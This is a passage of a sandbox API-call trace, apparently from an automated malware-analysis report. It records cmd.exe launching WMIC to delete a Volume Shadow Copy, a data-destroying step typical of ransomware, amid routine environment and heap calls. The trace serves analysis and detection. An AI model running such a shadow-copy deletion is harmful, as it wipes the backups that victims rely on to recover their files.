lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.954] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a78f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.955] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a78f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.955] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0124.955] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0124.955] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0124.955] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0124.955] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0124.955] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0124.955] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0124.955] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0124.955] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0124.955] GetProcessHeap () returned 0x2d0000 [0124.955] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9620 | out: hHeap=0x2d0000) returned 1 [0124.955] GetEnvironmentStringsW () returned 0x2e8b90* [0124.955] GetProcessHeap () returned 0x2d0000 [0124.955] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa94) returned 0x2ead60 [0124.955] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0124.955] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a78f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.955] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a78f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0124.955] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0124.955] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0124.955] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0124.955] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0124.955] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0124.955] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0124.955] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0124.955] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0124.955] GetProcessHeap () returned 0x2d0000 [0124.955] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5c) returned 0x2eb800 [0124.955] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f4b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0124.956] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x12f4b0, lpFilePart=0x12f490 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x12f490*="Desktop") returned 0x25 [0124.956] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0124.956] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f1c0 | out: lpFindFileData=0x12f1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2eb870 [0124.956] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0124.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x12f1c0 | out: lpFindFileData=0x12f1c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2eb870 [0124.956] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0124.956] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0124.956] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x12f1c0 | out: lpFindFileData=0x12f1c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2eb870 [0124.956] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0124.956] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0124.956] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0124.957] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ead60 | out: hHeap=0x2d0000) returned 1 [0124.957] GetEnvironmentStringsW () returned 0x2eb870* [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2ec360 [0124.957] FreeEnvironmentStringsW (penv=0x2eb870) returned 1 [0124.957] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a79c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb800 | out: hHeap=0x2d0000) returned 1 [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2ece50 [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe4) returned 0x2e9680 [0124.957] GetProcessHeap () returned 0x2d0000 [0124.957] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0124.957] GetConsoleOutputCP () returned 0x1b5 [0124.957] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a79bfe0 | out: lpCPInfo=0x4a79bfe0) returned 1 [0124.958] GetUserDefaultLCID () returned 0x409 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a797b50, cchData=8 | out: lpLCData=":") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f5c0, cchData=128 | out: lpLCData="0") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f5c0, cchData=128 | out: lpLCData="0") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f5c0, cchData=128 | out: lpLCData="1") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a7aa740, cchData=8 | out: lpLCData="/") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a7aa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a7aa460, cchData=32 | out: lpLCData="Tue") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a7aa420, cchData=32 | out: lpLCData="Wed") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a7aa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a7aa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a7aa360, cchData=32 | out: lpLCData="Sat") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a7aa700, cchData=32 | out: lpLCData="Sun") returned 4 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a797b40, cchData=8 | out: lpLCData=".") returned 2 [0124.958] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a7aa4e0, cchData=8 | out: lpLCData=",") returned 2 [0124.959] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0124.959] GetProcessHeap () returned 0x2d0000 [0124.959] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e97e0 [0124.959] GetConsoleTitleW (in: lpConsoleTitle=0x2e97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.959] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0124.959] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0124.959] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0124.959] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0124.960] GetProcessHeap () returned 0x2d0000 [0124.960] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2ece50 [0124.960] GetProcessHeap () returned 0x2d0000 [0124.960] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0124.962] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0124.962] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0124.962] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0124.962] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0124.962] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0124.962] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0124.962] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0124.962] GetProcessHeap () returned 0x2d0000 [0124.962] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9a00 [0124.962] GetProcessHeap () returned 0x2d0000 [0124.962] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2e9ac0 [0124.964] GetProcessHeap () returned 0x2d0000 [0124.964] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x9e) returned 0x2e9b20 [0124.965] GetConsoleTitleW (in: lpConsoleTitle=0x12f4d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.965] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.965] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.965] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f060, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f040, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f040*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.965] GetProcessHeap () returned 0x2d0000 [0124.965] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2e9bd0 [0124.965] GetProcessHeap () returned 0x2d0000 [0124.965] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe2) returned 0x2e9df0 [0124.965] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2d1320 [0124.966] SetErrorMode (uMode=0x0) returned 0x8001 [0124.966] SetErrorMode (uMode=0x1) returned 0x0 [0124.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x2d1330, lpFilePart=0x12ed60 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x12ed60*="wbem") returned 0x18 [0124.966] SetErrorMode (uMode=0x8001) returned 0x1 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d1320, Size=0x54) returned 0x2d1320 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d1320) returned 0x54 [0124.966] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e9ee0 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2e9f30 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f30, Size=0x48) returned 0x2e9f30 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f30) returned 0x48 [0124.966] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a78f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.966] GetProcessHeap () returned 0x2d0000 [0124.966] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2e9f90 [0124.970] GetProcessHeap () returned 0x2d0000 [0124.970] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f90, Size=0x7e) returned 0x2e9f90 [0124.970] GetProcessHeap () returned 0x2d0000 [0124.970] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f90) returned 0x7e [0124.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0124.971] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x12ead0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ead0) returned 0x2ea020 [0124.971] GetProcessHeap () returned 0x2d0000 [0124.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e46c0 [0124.971] FindClose (in: hFindFile=0x2ea020 | out: hFindFile=0x2ea020) returned 1 [0124.971] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0124.971] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0124.971] GetConsoleTitleW (in: lpConsoleTitle=0x12f020, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0124.971] InitializeProcThreadAttributeList (in: lpAttributeList=0x12edd8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12ed98 | out: lpAttributeList=0x12edd8, lpSize=0x12ed98) returned 1 [0124.971] UpdateProcThreadAttribute (in: lpAttributeList=0x12edd8, dwFlags=0x0, Attribute=0x60001, lpValue=0x12ed88, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12edd8, lpPreviousValue=0x0) returned 1 [0124.971] GetStartupInfoW (in: lpStartupInfo=0x12eef0 | out: lpStartupInfo=0x12eef0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0124.971] GetProcessHeap () returned 0x2d0000 [0124.971] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e46f0 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0124.971] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.972] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0124.972] GetProcessHeap () returned 0x2d0000 [0124.972] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e46f0 | out: hHeap=0x2d0000) returned 1 [0124.972] GetProcessHeap () returned 0x2d0000 [0124.972] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e8a30 [0124.972] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0124.973] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12ee10*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12edc0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete", lpProcessInformation=0x12edc0*(hProcess=0x54, hThread=0x50, dwProcessId=0xab4, dwThreadId=0xa10)) returned 1 [0124.977] CloseHandle (hObject=0x50) returned 1 [0124.977] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0124.977] GetProcessHeap () returned 0x2d0000 [0124.977] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec360 | out: hHeap=0x2d0000) returned 1 [0124.977] GetEnvironmentStringsW () returned 0x2ead60* [0124.977] GetProcessHeap () returned 0x2d0000 [0124.977] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2eb850 [0124.977] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0124.977] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0130.439] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12ed08 | out: lpExitCode=0x12ed08*=0x0) returned 1 [0130.439] CloseHandle (hObject=0x54) returned 1 [0130.439] _vsnwprintf (in: _Buffer=0x12ef78, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ed18 | out: _Buffer="00000000") returned 8 [0130.439] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0130.439] GetProcessHeap () returned 0x2d0000 [0130.439] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb850 | out: hHeap=0x2d0000) returned 1 [0130.439] GetEnvironmentStringsW () returned 0x2ead60* [0130.439] GetProcessHeap () returned 0x2d0000 [0130.439] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0130.439] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0130.439] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0130.440] GetProcessHeap () returned 0x2d0000 [0130.440] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb880 | out: hHeap=0x2d0000) returned 1 [0130.440] GetEnvironmentStringsW () returned 0x2ead60* [0130.440] GetProcessHeap () returned 0x2d0000 [0130.440] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0130.440] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0130.440] GetProcessHeap () returned 0x2d0000 [0130.440] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8a30 | out: hHeap=0x2d0000) returned 1 [0130.440] DeleteProcThreadAttributeList (in: lpAttributeList=0x12edd8 | out: lpAttributeList=0x12edd8) [0130.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.440] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0130.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0130.440] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a78e194 | out: lpMode=0x4a78e194) returned 1 [0130.441] _get_osfhandle (_FileHandle=0) returned 0x3 [0130.441] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a78e198 | out: lpMode=0x4a78e198) returned 1 [0130.441] SetConsoleInputExeNameW () returned 0x1 [0130.441] GetConsoleOutputCP () returned 0x1b5 [0130.441] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a79bfe0 | out: lpCPInfo=0x4a79bfe0) returned 1 [0130.441] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0130.441] exit (_Code=0) Process: id = "51" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x2532b000" os_pid = "0xab4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0x87c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 259 os_tid = 0xa10 [0125.013] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfaf0 | out: lpSystemTimeAsFileTime=0x1cfaf0*(dwLowDateTime=0x51f177f0, dwHighDateTime=0x1d68245)) [0125.013] GetCurrentProcessId () returned 0xab4 [0125.013] GetCurrentThreadId () returned 0xa10 [0125.013] GetTickCount () returned 0x1154bff [0125.013] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfaf8 | out: lpPerformanceCount=0x1cfaf8*=24490626123) returned 1 [0125.016] GetModuleHandleW (lpModuleName=0x0) returned 0xffdf0000 [0125.016] __set_app_type (_Type=0x1) [0125.016] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe3ced0) returned 0x0 [0125.017] __wgetmainargs (in: _Argc=0xffe62380, _Argv=0xffe62390, _Env=0xffe62388, _DoWildCard=0, _StartInfo=0xffe6239c | out: _Argc=0xffe62380, _Argv=0xffe62390, _Env=0xffe62388) returned 0 [0125.017] ??0CHString@@QEAA@XZ () returned 0xffe62ab0 [0125.017] malloc (_Size=0x30) 